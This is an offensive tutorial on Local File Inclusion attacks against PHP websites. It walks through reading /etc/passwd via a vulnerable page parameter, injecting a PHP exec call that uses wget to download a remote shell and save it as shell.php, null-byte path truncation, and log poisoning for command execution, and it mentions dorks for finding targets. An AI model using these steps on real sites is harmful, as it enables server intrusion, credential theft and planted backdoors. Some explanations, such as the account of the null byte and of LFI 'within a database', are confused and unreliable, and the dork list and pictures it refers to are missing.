[ lfi ]

LFI is a Local File Inclusion. This is when you find a particular file within a database and uses it against the web server. Such as discovering the /etc/passwd/ username/ password

Here are some dorks:


An example of a vulnerable site would look like this: www.site.com/index.php?page=/etc/passwd

After checking etc/passwd we need to now check for /proc/self/environ. Below is a picture of /proc/self/environ.

Next we need to change the user agent and try to get data from the site by injecting some code. To do this open tamperdata then hit start tamper, and refresh your page.

Code: <?exec('wget http://www.site.com/shell.txt -O shell.php');?>

load your shell using same method http://www.site.com/index.php?page=shell.php

Then You should have a shell like this:

Every now and again, though, the website may output that /etc/passwd/ cannot be found simply because the server is interpreting the location as if it is /etc/passwd.php/. To correct this, we need to apply what is called a Null Byte. This bit of code looks like: %00. In SQL, it means 0, but everywhere else in coding, it is interpreted similar to a black hole, such as /dev/null/. This code eliminates the use of an extension. The code would appear as /etc/passwd%00 when entered into the address bar. At this point in time, we know two things: one – that noth- ing is properly passed through with- out being sanitized by PHP, and two – we now know that we have the abil- ity to look for logs to inject. Normally, LFI tutorials stop a few lines above here, but we shall go a bit more in depth. There are many common de- fault directories/*.log locations for mainly Apache-based web servers. You then would apply each directory string after the = and see where it takes you. If success- ful, you should see a page that displays some sort of log for the moment it is executed. If it fails, you will be redirect- ed to either a Page cannot be found. You will need to find what you can about the webserver such as the OS what version its running, etc. If you come across a vulnerable box that does not display pass through text, and displays a list of shadowed passwords you can use the Headers to figure out which is the default directory for where the logs might be. Once you have found the directory you can attempt to inject a command within the browser.